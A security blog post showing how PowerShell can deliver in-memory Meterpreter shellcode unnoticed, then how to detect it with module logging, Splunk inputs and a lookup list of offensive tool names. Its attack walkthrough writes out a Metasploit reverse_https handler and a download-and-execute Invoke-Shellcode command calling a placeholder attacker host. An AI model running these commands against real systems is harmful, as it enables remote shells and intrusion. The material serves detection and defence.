Powershell: A Traceless Threat As Well As How To Protect Yourself

For the past little while I have been spending time learning about PowerShell and how it can be used as a subtle threat vector within your network. A number of PowerShell exploitation frameworks have popped up recently, including PowerSploit and Empire, which Greg covered at length back in September. I, however, wanted to spend some time demonstrating how subtle and insidious PowerShell can be when used as a threat medium.

As mentioned in an earlier post, according to Verizon's 2013 Data Breach Report 76% of breaches involved stolen or weak credentials. So, to start, this post will assume that you have already been exploited and that the attacker potentially has admin or domain admin credentials, in order to focus on PowerShell as a threat vector.

A huge thank you to Ryan Kazanciyan and Matt Hastings for their research on PowerShell attacks, which was the starting point and main resource for the research on this topic.

Downloading and Connecting to Metasploit

Once an actor gains access to a random Windows server within your environment, the first action they will typically perform is to escalate privileges. PowerSploit has a neat PowerShell module called Invoke-ShellCode that can inject shellcode into a running process or even into PowerShell itself. So, for example, you can set up a Kali Linux server with a Metasploit handler listening on port 443 for incoming shellcode connections:
Metasploit:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST <Your local host>
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit
Then you can run the following commands to download and run the PowerShell Invoke-Shellcode script (it is Invoke--Shellcode, with two hyphens, in the Git repositories. That was a wasted day and a half.) This will create an HTTPS connection back to a C&C Meterpreter shell, or worse:
PowerShell:
IEX (New-Object Net.WebClient).DownloadString("https://<Malicious URL>/Invoke-Shellcode.ps1")
Invoke-ShellCode -Payload windows/meterpreter/reverse_https -Lhost <malicious IP> -Lport 443 -Force

Event Logging

Because both the download and the shellcode connections are over HTTPS, most perimeter IPS/antivirus will not inspect them. The shellcode runs in memory and never touches the disk, which makes it very hard to detect with both antivirus and classic forensics, but the important thing to focus on here is how PowerShell logs these events for hunting. Executing the above on a Windows 2008 R2 OS with PowerShell 2.0 generates only three relevant events in the Windows PowerShell event log:
The Windows PowerShell Event Log After Executing ShellCode in PowerShell

Leaving basically three events to go by:

Event ID 400: Engine state is changed from None to Available.
Event ID 403: Engine state is changed from Available to Stopped.
Event ID 600: Provider "Certificate" is Started.
(Log: Windows PowerShell)
There is nothing in the event logs about running a script that invokes a shellcode backdoor to my malicious C&C domain. Can you believe Windows Event Logs? Ridiculous. But, security-wise, this is a serious concern, since there is no indication of what commands or scripts were run, by whom, or what actions the system took. Running similar scripts such as Invoke-Mimikatz also produces roughly the same events from within a PowerShell context.

This is a well-known limitation of PowerShell 2.0; however, the challenge is that most environments run operating systems that have PowerShell 2.0 installed by default, leaving organizations that don't use PowerShell with little reason to upgrade. This also leaves an active hole in an organization's security posture towards potential threat vectors. You can't understand what is happening if your system won't tell you.

PowerShell 3.0 comes with many improvements, including improved logging, so running the above command on a machine with PowerShell 3.0 will give you the same three events in Windows PowerShell, but it will also give you a number of new events in both Windows-PowerShell/Operational and Windows-WinRM/Operational.

Event ID 403: PowerShell Console Startup
Event ID 40961: Engine state is changed from None to Available.
Event ID 40962: PowerShell console is ready for user input
(Log: Microsoft-Windows-PowerShell/Operational)

Event ID 208: The Winrm service is starting
Event ID 209: The Winrm service started successfully
Event ID 211: The Winrm service is stopping
Event ID 212: The Winrm service was stopped successfully
(Log: Microsoft-Windows-WinRM/Operational)

This is better: we are able to see that the PowerShell console was manually started and that the WinRM service was used in some capacity, but there is no knowledge of what scripts or commands were run or what the results of those commands were. On a side note, while running Invoke-ShellCode I mistyped the URL and received an event log 4100 with the error message "No connection could be made because the target machine actively refused." More on that later, but for now the overall lack of usable events is frightening and cannot stand.

PowerShell Module Logging

One option is to add logging options to the global PowerShell profile; however, profiles can easily be bypassed by adding the "-NoProfile" flag to your commands. The better option is to enable PowerShell Module Logging in your GPO. [Edit: PowerShell 3.0+ is required on the system.] To do so, go to your Group Policy Editor -> Computer Configuration -> Policies -> Administrative Templates -> Windows Components -> Windows PowerShell:

GPO Windows PowerShell Module Logging Location
The Windows PowerShell section will list the Turn on Module Logging setting:
Windows PowerShell Module Logging Modules
Select Enabled and click the Module Names: Show button:
Windows PowerShell Module Logging Properties
From there add the lines "Microsoft.PowerShell.*" and "Microsoft.WSMan.Management":

Module Logging for PowerShell and WSMan
Now, let's try the remote shellcode connection again:
Windows Event Log with Module Logging
It worked! We can see the commands that were executed. It worked... too well. We see approximately 300 events, one event for each command executed in the Invoke-Shellcode script. Well, this is quite troubling. You are going to need a SIEM to process this type of volume, and we will use Splunk for this scenario.

Setting up Splunk for PowerShell Events

To input PowerShell events into Splunk, create an inputs.conf with the following stanza:
[WinEventLog://Windows PowerShell]
disabled = false
index = wineventlog
This stanza will read events from the Windows PowerShell event log, which is where the PowerShell commands are saved. Other Windows event logs that you can collect for good posture are the PowerShell Operational, PowerShell Analytic and WinRM Operational event logs. Use the following stanzas for each:
[WinEventLog://Microsoft-Windows-PowerShell/Operational]
disabled = false
index = wineventlog

[WinEventLog://Microsoft-Windows-PowerShell/Analytic]
disabled = false
index = wineventlog

[WinEventLog://Microsoft-Windows-WinRM/Operational]
disabled = false
index = wineventlog
So now that we have our events in Splunk, we need a way to search for malicious events. First, what is a malicious event in PowerShell? I like to look for the keywords used in gfoss' PowerShell Command Line Logging list:
  • Set-ExecutionPolicy
  • Mimikatz
  • EncodedCommand
  • Payload
  • Find-AVSignature
  • DllInjection
  • ReflectivePEInjection
  • Invoke-Shellcode
  • Invoke--Shellcode
  • Invoke-ShellcodeMSIL
  • Get-GPPPassword
  • Get-Keystrokes
  • Get-TimedScreenshot
  • Get-VaultCredential
  • Invoke-CredentialInjection
  • Invoke-NinjaCopy
  • Invoke-TokenManipulation
  • Out-Minidump
  • Set-MasterBootRecord
  • New-ElevatedPersistenceOption
  • Invoke-CallbackIEX
  • Invoke-PSInject
  • Invoke-DllEncode
  • Get-ServiceUnquoted
  • Get-ServiceEXEPerms
  • Get-ServicePerms
  • Invoke-ServiceUserAdd
  • Invoke-ServiceCMD
  • Write-UserAddServiceBinary
  • Write-CMDServiceBinary
  • Write-UserAddMSI
  • Write-ServiceEXE
  • Write-ServiceEXECMD
  • Restore-ServiceEXE
  • Invoke-ServiceStart
  • Invoke-ServiceStop
  • Invoke-ServiceEnable
  • Invoke-ServiceDisable
  • Invoke-FindDLLHijack
  • Invoke-FindPathHijack
  • Get-RegAlwaysInstallElevated
  • Get-RegAutoLogon
  • Get-UnattendedInstallFiles
  • Get-Webconfig
  • Get-ApplicationHost
  • Invoke-AllChecks
  • Invoke-MassCommand
  • Invoke-MassMimikatz
  • Invoke-MassSearch
  • Invoke-MassTemplate
  • Invoke-MassTokens
  • HTTP-Backdoor
  • Add-ScrnSaveBackdoor
  • Gupt-Backdoor
  • Invoke-ADSBackdoor
  • Execute-OnTime
  • DNS_TXT_Pwnage
  • Out-Word
  • Out-Excel
  • Out-Java
  • Out-Shortcut
  • Out-CHM
  • Out-HTA
  • Enable-DuplicateToken 
  • Remove-Update
  • Execute-DNSTXT-Code
  • Download-Execute-PS
  • Execute-Command-MSSQL
  • Download_Execute
  • Get-PassHashes
  • Invoke-CredentialsPhish
  • Get-LsaSecret
  • Get-Information
  • Invoke-MimikatzWDigestDowngrade
  • Copy-VSS
  • Check-VM
  • Invoke-NetworkRelay
  • Create-MultipleSessions
  • Run-EXEonRemote
  • Invoke-BruteForce
  • Port-Scan
  • Invoke-PowerShellIcmp
  • Invoke-PowerShellUdp
  • Invoke-PsGcatAgent
  • Invoke-PoshRatHttps
  • Invoke-PowerShellTcp
  • Invoke-PoshRatHttp
  • Invoke-PowerShellWmi
  • Invoke-PSGcat
  • Remove-PoshRat
  • TexttoEXE
  • Invoke-Encode
  • Invoke-Decode
  • Base64ToString
  • StringtoBase64
  • Do-Exfiltration
  • Parse_Keys
  • Add-Exfiltration
  • Add-Persistence
  • Remove-Persistence
  • Invoke-CreateCertificate
  • powercat
  • Find-PSServiceAccounts
  • Get-PSADForestKRBTGTInfo
  • Discover-PSMSSQLServers
  • Discover-PSMSExchangeServers
  • Get-PSADForestInfo
  • Get-KerberosPolicy
  • Discover-PSInterestingServices
Searching for all of these in Splunk would be very expensive as a regex search, especially if you're putting it into an alert. Two options are to hard-code a search of all of the above malicious values, or to create a CSV file that Splunk can use as a lookup for the keywords in the search. For example, create the CSV BadPowerShellCommands.csv with the heading BadPowerShellCommand and the commands in the column underneath, and upload it to your /opt/splunk/etc/system/lookups folder. Now, run the search:
index=wineventlog sourcetype="WinEventLog:Windows PowerShell" [|inputlookup BadPowerShellCommands.csv| rename BadPowerShellCommand as search | format]
This will filter your PowerShell event set down to anything containing a malicious command. Next, in the search page, click the Save As button and save as Alert:
Splunk Search with Save option for creating an Alert
This opens the Alert Creation window:
Alert creation screen

Depending on your environment you may need to play with the scenarios that you alert on. For example, if your administrators are heavy PowerShell users, you may want to whitelist your administrators except during off hours/non-change window periods. I would also monitor for the command "Enable-PSRemoting", since this command enables the ability to remotely execute PowerShell commands on the local machine. Only administrators with a need should enable this feature.

Finally, if your environment doesn't use PowerShell, you can look for interactive PowerShell commands (or perhaps only during off hours/non-change windows) such as "Invoke-Command" and "Enter-PSSession".
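To make the lookup search and the tuning rules above concrete, here is an added example (not code from the original post or from Splunk) that runs the same logic offline in Python: it reads a BadPowerShellCommands.csv-style lookup, scans a handful of constructed module-logging event records for those keywords, whitelists administrators during business hours, always flags Enable-PSRemoting, and flags the interactive commands Invoke-Command and Enter-PSSession only off hours or where PowerShell is not used. The event messages, user names, timestamps and business-hours boundaries are all assumptions constructed for the example, and the matching is a case-insensitive substring test rather than Splunk's term search; the to_splunk_search helper builds the hard-coded alternative to the inputlookup subsearch.

```python
"""Offline model of the Splunk keyword-lookup alert for PowerShell module-logging events.

Added example, not from the original post. Event records, user names and the
business-hours window are constructed assumptions for illustration only.
"""
import csv
import io
from datetime import datetime, time

# Constructed subset of BadPowerShellCommands.csv, using the same heading as the post.
BAD_COMMANDS_CSV = """BadPowerShellCommand
Invoke-Shellcode
Invoke--Shellcode
Mimikatz
EncodedCommand
Set-ExecutionPolicy
Enable-PSRemoting
"""

# Interactive commands worth watching off hours (or everywhere, if PowerShell is not used).
INTERACTIVE_COMMANDS = ("Invoke-Command", "Enter-PSSession")

# Constructed sample events: (timestamp, user, message). The message shape is assumed,
# loosely modelled on module-logging entries; it is not copied from any real log.
SAMPLE_EVENTS = [
    ("2015-11-03T02:14:05", "CORP\\svc-web",
     "Pipeline execution details for command line: Invoke-ShellCode -Payload windows/meterpreter/reverse_https -Lhost 203.0.113.10 -Lport 443 -Force"),
    ("2015-11-03T10:02:11", "CORP\\admin-jane",
     "Pipeline execution details for command line: Get-Service -Name WinRM"),
    ("2015-11-03T10:03:40", "CORP\\admin-jane",
     "Pipeline execution details for command line: Enable-PSRemoting -Force"),
    ("2015-11-03T23:41:09", "CORP\\admin-jane",
     "Pipeline execution details for command line: Enter-PSSession -ComputerName FS01"),
    ("2015-11-03T11:15:00", "CORP\\bob",
     "Pipeline execution details for command line: powershell.exe -NoProfile -EncodedCommand SQBFAFgA"),
    ("2015-11-03T11:20:00", "CORP\\bob",
     "Engine state is changed from Available to Stopped."),
]


def load_bad_commands(csv_text):
    """Read the lookup column BadPowerShellCommand from CSV text, in file order."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return [row["BadPowerShellCommand"].strip() for row in reader if row["BadPowerShellCommand"].strip()]


def matched_keywords(message, keywords):
    """Return the keywords that occur in the message (case-insensitive substring match)."""
    lowered = message.lower()
    return [k for k in keywords if k.lower() in lowered]


def is_off_hours(ts_text, start=time(18, 0), end=time(7, 0)):
    """True when the ISO timestamp falls outside the assumed 07:00-18:00 business window."""
    t = datetime.fromisoformat(ts_text).time()
    return t >= start or t < end


def to_splunk_search(keywords, index="wineventlog", sourcetype="WinEventLog:Windows PowerShell"):
    """Build the hard-coded OR search the post mentions as the alternative to inputlookup."""
    terms = " OR ".join('"%s"' % k for k in keywords)
    return 'index=%s sourcetype="%s" (%s)' % (index, sourcetype, terms)


def triage(events, bad_commands, admins, environment_uses_powershell=True):
    """Apply the post's alerting rules to each event and return the alerts raised."""
    alerts = []
    for ts_text, user, message in events:
        off_hours = is_off_hours(ts_text)
        hits = matched_keywords(message, bad_commands)
        interactive = matched_keywords(message, INTERACTIVE_COMMANDS)
        reason = None
        if hits:
            # Admins are allowed during business/change windows, but Enable-PSRemoting is never whitelisted.
            always_flag = "enable-psremoting" in {h.lower() for h in hits}
            admin_allowed = user in admins and not off_hours and not always_flag
            if not admin_allowed:
                reason = "bad-command"
        elif interactive and (off_hours or not environment_uses_powershell):
            reason = "interactive"
        if reason:
            alerts.append({"time": ts_text, "user": user, "reason": reason, "matches": hits or interactive})
    return alerts


if __name__ == "__main__":
    bad = load_bad_commands(BAD_COMMANDS_CSV)
    print(to_splunk_search(bad))
    for alert in triage(SAMPLE_EVENTS, bad, admins={"CORP\\admin-jane"}):
        print(alert)
```

With the constructed data, four alerts are raised: the service account's Invoke-ShellCode, the administrator's Enable-PSRemoting (flagged despite the whitelist), the administrator's off-hours Enter-PSSession, and bob's -EncodedCommand; the administrator's daytime Get-Service and the bare engine-state event are left alone.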